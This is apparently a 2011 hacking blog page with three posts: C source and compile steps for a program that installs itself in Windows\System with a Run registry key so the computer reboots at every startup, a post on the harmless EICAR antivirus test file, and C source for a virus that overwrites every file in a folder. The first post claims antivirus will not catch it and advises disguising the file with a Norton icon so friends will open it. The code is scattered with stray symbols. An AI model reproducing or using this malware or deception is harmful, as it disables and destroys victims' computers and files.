Saturday, December 24, 2011

A Virus Program to Restart the Computer at Every Startup



Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus needs to be double-clicked only once, and from then onwards it will carry out the rest of the operations. And one more thing: none of the antivirus software detects this as a virus since I have coded this virus in C. So if you are familiar with the C language, then it’s easy to understand the logic behind the code.
Here is the source code.

#include
#include♥
#include
int found,♥drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File bloc♥k structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)♥
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=♥findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;ret♥urn;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffbl♥k,FA_DIREC);
if(don♥e==0)♥
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_n♥o=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is ♥not already infected
{
self=fopen(_argv[0],”rb”); //T♥he virus file open’s itself
switch(drive_no)
{
case 1:♥
target=fopen(♥“C:\\windows\\system\\sysres.exe”,”wb”); //to place a co♥py of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen♥(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD♥ HKEY_CURREN♥T_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:♥
target=fopen(“F:\\wind♥ows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
♥CurrentVersion\\Run \/v sres \/t REG_SZ♥ \/d
F:\\windows\\system\\sys♥res.exe”);
break;

default:
ex♥it(0);
}

while(fread(buff♥,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall♥();
}

else
system(“shutd♥own -r -t 0″); //if the system is already infected then just gi♥ve a command to restart
}


Compiling The Source Code Into Executable Virus.

1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For a step-by-step compilation guide, refer to my post How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From now on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE

2. Go to X:\Windows\System (X can be C, D, E or F).

3. You will find a file named sysres.exe; delete it.

4. Type regedit in Run to open the Registry Editor. Navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

There, on the right side, you will see an entry named “sres”. Delete this entry. That’s it. You have removed this virus successfully.
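The removal steps above amount to two indicators: a Run value named sres and a sysres.exe file in X:\Windows\System. As an added example (not part of the original post), this sketch parses the text printed by `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and flags those indicators, plus any autostart from the legacy System directory. The function names and the sample output are constructed, and the four-space column layout is an assumption about the `reg query` output format.

```python
import re

# Constructed sample of `reg query` output for the HKCU Run key; the "sres"
# value is the entry described in this post, the others are made-up neighbours.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    sres    REG_SZ    C:\windows\system\sysres.exe
    Updater    REG_EXPAND_SZ    %LOCALAPPDATA%\Vendor\update.exe --silent
"""

# Assumed layout of a value line: 4 spaces, name, 4 spaces, REG_* type, 4 spaces, data.
VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
# An executable directly inside <drive>:\Windows\System (System32 does not match).
LEGACY_SYSTEM_DIR = re.compile(r'^"?[A-Za-z]:\\windows\\system\\[^\\"]+\.exe', re.IGNORECASE)


def parse_run_values(reg_output):
    """Return (name, type, data) for each value line in `reg query` text."""
    values = []
    for line in reg_output.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values.append((m["name"], m["type"], m["data"].strip()))
    return values


def suspicious_run_values(reg_output):
    """Return (name, data, reasons) for values matching the post's indicators."""
    findings = []
    for name, _type, data in parse_run_values(reg_output):
        reasons = []
        if name.lower() == "sres":
            reasons.append("value name 'sres'")
        if "sysres.exe" in data.lower():
            reasons.append("target sysres.exe")
        if LEGACY_SYSTEM_DIR.match(data):
            reasons.append(r"autostart from <drive>:\Windows\System")
        if reasons:
            findings.append((name, data, reasons))
    return findings


if __name__ == "__main__":
    for name, data, reasons in suspicious_run_values(SAMPLE_REG_QUERY):
        print(f"{name} -> {data}: {', '.join(reasons)}")
```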

Logic Behind The Working Of The Virus

If I don’t explain the logic (algorithm) behind the working of the virus, this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts, please leave comments.

LOGIC:

1. First the virus will find the root partition (the partition on which Windows is installed).

2. Next it will determine whether the virus file is already copied (already infected) into X:\Windows\System.

3. If not, it will just place a copy of itself into X:\Windows\System and make a registry entry to put this virus file onto the startup.

4. Or else, if the virus is already found in the X:\Windows\System directory (folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double-click the Sysres.exe file. The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example, you can change the .exe file’s icon into the Norton antivirus ICON itself so that people seeing this file believe that it is Norton antivirus. Or you can change its ICON into the ICON of any popular and trusted program so that people will definitely click on it.

Thursday, December 22, 2011

EICAR Test (Test the Working of your Antivirus, which can also help you to know your Antivirus’s proper state) !!

What about you??

Have you ever wondered how to test your antivirus software to ensure its proper working?
If your answer is known, then you must apply the article below.

It’s just an easy way to test your antivirus: a test developed by the European Institute of Computer Antivirus Research.
It’s a very simple test named the EICAR Test. It will work on any type and kind of antivirus.
This process can be used by companies, antivirus programmers, and individuals to test the proper functioning of antivirus/antimalware software without having a real computer virus, which can damage our computers.

Let’s see the process >>



Step 1. Open a notepad (New Text Document.TXT)

Step 2. Copy the following code (EICAR Test code) exactly onto the notepad --



X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Step 3. Save the notepad.

Step 4. Rename the file from New Text Document.TXT to myfile.com

Step 5. Now run an “antivirus scan” on this “myfile.com” file.

**If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.

Points to be noted :-

Most antivirus software will pop up a warning message at “Step 4” itself. You can also place the myfile.com file in a ZIP or RAR file and run a scan on it, so as to check whether your antivirus can detect the test string in a compressed archive. Any antivirus, when scanning this file, will respond exactly as it would for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.
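Step 2 says to copy the string exactly, and the reason matters: EICAR defines the test file as starting with these 68 bytes, optionally followed only by whitespace (space, tab, LF, CR, Ctrl-Z), with a total length of at most 128 bytes. The added example below (not from the original post; function names are assumptions) checks a saved file's bytes against that definition, so a silent scanner can be told apart from a malformed test file, and builds the ZIP variant in memory for the archive check.

```python
import io
import zipfile

# The 68-byte string from Step 2, split in two so this source file is not
# itself flagged by the scanner under test.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$" + b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
ALLOWED_TRAILING = b" \t\n\r\x1a"  # space, tab, LF, CR, Ctrl-Z
MAX_LEN = 128


def check_test_file(data):
    """Return (ok, reason) for the raw bytes of a candidate test file."""
    if data.startswith(b"\xef\xbb\xbf"):
        return False, "UTF-8 byte order mark before the string"
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return False, "saved as UTF-16"
    if not data.startswith(EICAR):
        return False, "does not start with the 68-byte test string"
    if len(data) > MAX_LEN:
        return False, "longer than 128 bytes"
    if data[len(EICAR):].strip(ALLOWED_TRAILING):
        return False, "non-whitespace bytes after the string"
    return True, "valid test file"


def zipped_test_file(name="myfile.com"):
    """Build, in memory, a ZIP archive holding the test file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, EICAR)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed variants of what an editor might have written to disk.
    variants = {
        "exact": EICAR,
        "with CRLF": EICAR + b"\r\n",
        "with BOM": b"\xef\xbb\xbf" + EICAR,
        "extra text": EICAR + b" test",
    }
    for label, data in variants.items():
        print(label, check_test_file(data))
    print("zip size:", len(zipped_test_file()))
```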

Wednesday, December 21, 2011

How to Create a Computer Virus?

The following program is to be used for "Educational purpose" only; it shows how we can create a virus in C. The program demonstrates a simple virus which, when executed (run), creates copies of itself in other files. It destroys other files by infecting them and spreads the infection to further files.

The source code is here (use it for study purposes only) -


#include♥<stdio.h>
#include<io.h>
#include♥♥<dos.h>
#include<dir.h>
#include<c♥onio.h>
#include<time.h>

FILE ♥*virus,*host;
int d♥one,a=0;
unsigned long x;
char buff[2048];
struct ff♥blk ffblk;
clock_t st,end;

void main()
{
st♥=clock();
clrscr();
done=findfirst(*♥.*,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0], rb);
host=f♥open(ffbl♥k.ff_name,rb+);
if(host=♥=NULL) goto next;
x=89088;
pri♥♥ntf(Infecting %s\n,ffblk.ff_name,a);
while(♥x>2048)
{
fre♥ad(buff,2048,1,virus);
fwrite(buff, ♥2048,1,host);
x-=2048;
}
fre♥ad(buff,x,1,virus);
fwrite(♥buff,x,1,host);
a++;
next:
{
fcl♥oseall();
done=findnext(&ffblk);
}♥
}
printf(DON♥E! (Total Files Infected= %d),a);
end=clock();
pr♥intf(TIME TAKEN♥=%f SEC\n,
(end-st)/CLK_TCK);
g♥etch();
}


Compiling Method:
Borland C++ 5.5 (32-Bit):
1. Compile once. Note down the generated .exe file length in bytes.
2. Change the value of x in the source code to this length in bytes.
3. Recompile it. The new .exe file is ready to infect.

Borland TC++ 3.0 (16-Bit):

1. Load the program in the compiler, press Alt+F9 to compile.
2. Press F9 to generate the .exe file (Do not press Ctrl+F9; this will infect all the files in the current directory and all the compiler files.)
3. Note down the size of the generated .exe file in bytes (find it in the .exe file's Properties).
4. Change the value of x in the source code to the size you noted down (change x=89088 in the source code above).
5. Once again follow Step 1 & Step 2.
6. The generated .exe file is ready to infect.

Don't try it out on your own computer. To test it:

1. Create & open a new empty folder.
2. Put some .exe files in it.
3. Run the virus .exe file there; you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect when you re-run the infected .exe files.
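Because the loop in the listing writes the same x bytes over the start of every file it opens, every affected file in the folder begins with an identical block, and that is something a responder can check for. The added example below (not from the original post; function names and sample files are constructed) groups the files in a directory by the hash of their first prefix_len bytes and reports the groups that share it.

```python
import hashlib
import os
import tempfile
from collections import defaultdict


def shared_prefix_groups(directory, prefix_len):
    """Group regular files by the SHA-256 of their first prefix_len bytes.

    Returns sorted lists of names for each group of two or more files that
    are at least prefix_len bytes long and start with identical bytes.
    """
    groups = defaultdict(list)
    for entry in os.scandir(directory):
        if not entry.is_file(follow_symlinks=False):
            continue
        with open(entry.path, "rb") as fh:
            head = fh.read(prefix_len)
        if len(head) < prefix_len:
            continue  # too short to contain the overwritten region
        groups[hashlib.sha256(head).hexdigest()].append(entry.name)
    return sorted(sorted(names) for names in groups.values() if len(names) > 1)


def build_constructed_demo(directory, prefix_len):
    """Write constructed stand-in files: two share a leading block, two do not."""
    block = (bytes(range(256)) * (prefix_len // 256 + 1))[:prefix_len]
    samples = {
        "a.exe": block + b"original tail of a",   # overwritten, tail survives
        "b.exe": block,                           # overwritten, was shorter
        "clean.exe": b"MZ" + b"\x00" * (prefix_len + 10),
        "small.txt": b"short",
    }
    for name, data in samples.items():
        with open(os.path.join(directory, name), "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_demo(tmp, 89088)  # x as set in the listing above
        print(shared_prefix_groups(tmp, 89088))
```

Exact duplicates of a legitimate file also share a prefix, so a reported group is a triage signal to compare against known-good copies or backups.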


** T & C for this Programme :-
**WARNING: FOR EDUCATIONAL PURPOSES ONLY**